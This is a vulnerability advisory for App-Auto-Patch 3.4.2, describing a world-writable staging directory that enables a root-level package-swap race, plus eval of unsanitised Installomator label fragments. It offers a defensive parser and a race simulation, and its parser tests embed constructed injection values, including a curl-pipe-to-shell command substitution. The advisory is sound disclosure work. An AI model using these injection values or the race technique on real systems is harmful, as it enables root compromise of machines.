App-Auto-Patch v3.4.2 creates its working directory with world-writable permissions (chmod 777), enabling a local TOCTOU (time-of-check-time-of-use) race condition. An unprivileged local attacker can exploit this to swap verified packages with malicious ones before installation, achieving arbitrary code execution as root. Additionally, a malicious Installomator label fragment can achieve arbitrary code execution via eval of unsanitized input during label parsing.
- Vulnerable: App-Auto-Patch <= 3.4.2
- Fixed: App-Auto-Patch 3.5.0
Score: 7.8 (High)
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
| Metric | Value |
|---|---|
| Attack Vector | Local |
| Attack Complexity | Low |
| Privileges Required | Low |
| User Interaction | None |
| Scope | Unchanged |
| Confidentiality | High |
| Integrity | High |
| Availability | High |
File: App-Auto-Patch-via-Dialog.zsh, line 2525
During installation, appAutoPatchFolder is created with chmod 777. Write permission on the directory lets any local user create, rename, or delete entries in it, which is enough to replace a package that root downloaded there even when the file itself is not writable by that user.
File: App-Auto-Patch-via-Dialog.zsh, line 4744
Installomator label fragments are read from disk and parsed with eval, with no validation of their contents. Because the fragments live under the world-writable directory, an attacker can drop or edit a fragment containing arbitrary shell, which then runs as root the next time the label is parsed.
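A strict parser for the `label) key="value" ... ;;` fragment shape, added here as an example and not code from App-Auto-Patch or Installomator. It accepts only an allowlisted set of keys and only double-quoted values that contain none of the characters the shell would expand inside quotes (`$`, backtick, backslash, `"`), so a fragment that tries command substitution, a trailing `; command`, or an unexpected variable name is rejected instead of being handed to eval. The key set, label name, URLs and payloads below are constructed for the example. Note the caveat: many upstream labels legitimately compute fields with `$(curl ...)`, so this check is a gate for fragments loaded from an untrusted or world-writable location, not a drop-in replacement for the project's parser.

```python
"""Strict parser for Installomator-style label fragments (added example, not project code)."""
import re

# Assumed subset of label variables; anything outside this set is rejected so a
# fragment cannot set PATH, IFS, or any other name the calling script relies on.
ALLOWED_KEYS = {
    "name", "type", "downloadURL", "expectedTeamID",
    "appNewVersion", "packageID", "blockingProcesses",
}

LABEL_RE = re.compile(r"^([A-Za-z0-9_-]+)\)$")
# key="value": the quoted value may not contain ", $, backtick or backslash,
# which are exactly the characters the shell still interprets inside "...".
ASSIGN_RE = re.compile(r'^([A-Za-z_][A-Za-z0-9_]*)="([^"$`\\]*)"$')


class LabelError(ValueError):
    """Raised for any line that is not a plain, allowlisted assignment."""


def parse_label_fragment(text: str) -> dict:
    """Return {'label': ..., key: value, ...} or raise LabelError."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    head = LABEL_RE.match(lines[0]) if lines else None
    if len(lines) < 2 or head is None or lines[-1] != ";;":
        raise LabelError("not a 'label) ... ;;' fragment")
    values = {"label": head.group(1)}
    for ln in lines[1:-1]:
        if not ln or ln.startswith("#"):
            continue                      # blank lines and comments are harmless
        m = ASSIGN_RE.match(ln)
        if m is None:
            raise LabelError(f"rejected line: {ln!r}")
        key, value = m.groups()
        if key not in ALLOWED_KEYS:
            raise LabelError(f"key not allowed: {key}")
        values[key] = value
    return values


def is_safe_fragment(text: str) -> bool:
    """True only if the fragment parses with no rejected lines."""
    try:
        parse_label_fragment(text)
        return True
    except LabelError:
        return False


# Constructed sample fragments: one benign, three tampered.
GOOD = """
examplelabel)
    name="Example App"
    type="pkg"
    downloadURL="https://example.invalid/ExampleApp.pkg"
    expectedTeamID="ABCDE12345"
    ;;
"""
# command substitution inside the quoted URL
INJECTED_SUBST = GOOD.replace(
    '"https://example.invalid/ExampleApp.pkg"',
    '"$(curl -fsSL https://example.invalid/x.sh | sh)"',
)
# a second command appended after a valid-looking assignment
INJECTED_TAIL = GOOD.replace('type="pkg"', 'type="pkg"; touch /tmp/pwned')
# a variable the patcher itself relies on
INJECTED_KEY = GOOD.replace('type="pkg"', 'PATH="/tmp/evil"')

if __name__ == "__main__":
    print(parse_label_fragment(GOOD))
    for sample in (INJECTED_SUBST, INJECTED_TAIL, INJECTED_KEY):
        print("rejected" if not is_safe_fragment(sample) else "ACCEPTED?!")
```

Whole-line anchoring (`^...$`) is what makes the trailing-command case fail: the regex has to consume the line up to the closing quote and nothing may follow it.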
1. App-Auto-Patch creates appAutoPatchFolder with chmod 777
2. Installomator downloads PKG to world-writable tmpDir, verifies signature
3. ~140 lines of bash execute between verification and installation (RACE WINDOW)
4. Attacker swaps verified PKG with malicious PKG
5. installer -pkg runs attacker's PKG as root
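The check/use gap in steps 2 to 5, as an added Python simulation that is not App-Auto-Patch, Installomator, or the PoC's code. It stages a constructed stand-in for a PKG, verifies it by digest, lets an attacker callback run in the window, and then installs by path again (the vulnerable shape) or from a private copy. Because the whole demo runs as one uid, the `attacker_swap` stand-in emulates a second, unprivileged user by honouring only the directory's other-write bit; the swap itself is a rename into the directory, which needs directory write permission rather than write permission on root's file. Running the vulnerable installer over a 0755 directory shows the page's fix; the private-copy variant is an additional defence-in-depth pattern, not the project's fix.

```python
"""Simulated verify-then-install race over a world-writable staging dir.
Added example, not App-Auto-Patch or Installomator code."""
import hashlib
import os
import stat
import tempfile
from pathlib import Path

# Constructed stand-ins for a vendor PKG and an attacker PKG with a root postinstall.
LEGIT_PKG = b"pkg: legitimate vendor payload"
EVIL_PKG = b"pkg: postinstall -> /bin/sh as root"


def digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def make_staging_dir(mode: int) -> Path:
    """Create the staging directory as the patcher would, with the given mode bits."""
    d = Path(tempfile.mkdtemp(prefix="aap-stage-"))
    os.chmod(d, mode)
    return d


def is_world_writable(path: Path) -> bool:
    """Audit check: does the 'other' class have write permission on this path?"""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def attacker_swap(pkg_path: Path) -> bool:
    """Unprivileged attacker replaces the verified PKG during the race window.
    Emulated uid check: a real second user would get EACCES unless the
    directory is world-writable, so only proceed when the o+w bit is set."""
    if not is_world_writable(pkg_path.parent):
        return False
    staged_evil = pkg_path.with_suffix(".evil")
    staged_evil.write_bytes(EVIL_PKG)
    os.replace(staged_evil, pkg_path)     # rename needs dir write, not file write
    return True


def install_vulnerable(pkg_path: Path, expected: str, race_window) -> bytes:
    """Check by path, run other work, then use by path again (the TOCTOU shape)."""
    if digest(pkg_path.read_bytes()) != expected:
        raise ValueError("signature check failed")
    race_window(pkg_path)                 # the ~140 lines of script run here
    return pkg_path.read_bytes()          # what `installer -pkg` would run as root


def install_hardened(pkg_path: Path, expected: str, race_window) -> bytes:
    """Copy once into a private dir (mkdtemp creates 0700), verify and install the copy."""
    private_copy = Path(tempfile.mkdtemp(prefix="aap-private-")) / pkg_path.name
    private_copy.write_bytes(pkg_path.read_bytes())
    if digest(private_copy.read_bytes()) != expected:
        raise ValueError("signature check failed")
    race_window(pkg_path)                 # attacker may still swap the staged file...
    return private_copy.read_bytes()      # ...but the installer never reads it again


def run_demo(staging_mode: int, install) -> bytes:
    """Stage LEGIT_PKG under a directory with the given mode and return what gets installed."""
    staging = make_staging_dir(staging_mode)
    pkg = staging / "Vendor.pkg"
    pkg.write_bytes(LEGIT_PKG)
    return install(pkg, digest(LEGIT_PKG), attacker_swap)


if __name__ == "__main__":
    print("777 + verify-then-reopen :", run_demo(0o777, install_vulnerable))
    print("777 + private copy       :", run_demo(0o777, install_hardened))
    print("755 + verify-then-reopen :", run_demo(0o755, install_vulnerable))
```

The first line prints the attacker's bytes; the other two print the vendor's. The 0755 case is the fix the page describes: with no other-write bit the rename in `attacker_swap` never happens, so the ordering of check and use stops mattering.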
- macOS system with App-Auto-Patch <= 3.4.2 (or any Installomator version that applies `chmod 777` to tmpDir)
- Unprivileged local user account
- Xcode command line tools (for `pkgbuild`)
Terminal 1 (as unprivileged user):

```
python3 poc.py
```

Terminal 2 (as root, simulating MDM/admin trigger):

```
sudo ./simulate-vulnerable-env.sh
```

The PoC monitors /var/tmp for Installomator directories created with chmod 777, then races to swap the legitimate PKG with a malicious one containing a postinstall script that executes as root.
See poc.py and simulate-vulnerable-env.sh for full details.
- Upgrade to App-Auto-Patch 3.5.0 or later
- The fix changes the directory permissions from `chmod 777` to `chmod 755`, so only the owning root user can create, rename, or delete entries in the directory; this removes the attacker's ability to swap the package and breaks the attack chain
| Date | Event |
|---|---|
| 2024-12-22 | Vulnerability discovered |
| 2024-12-22 | PoC created |
| 2024-12-22 | PR #202 submitted |
| 2024-12-22 | Issue #203 filed |
| 2025-12-23 | Fixed in App-Auto-Patch 3.5.0 |
| 2026-02-20 | CVE-2025-70341 assigned |
- cooldadhacking (GitHub)
This proof of concept is provided for educational and authorized security testing purposes only. Use responsibly and only on systems you own or have explicit permission to test.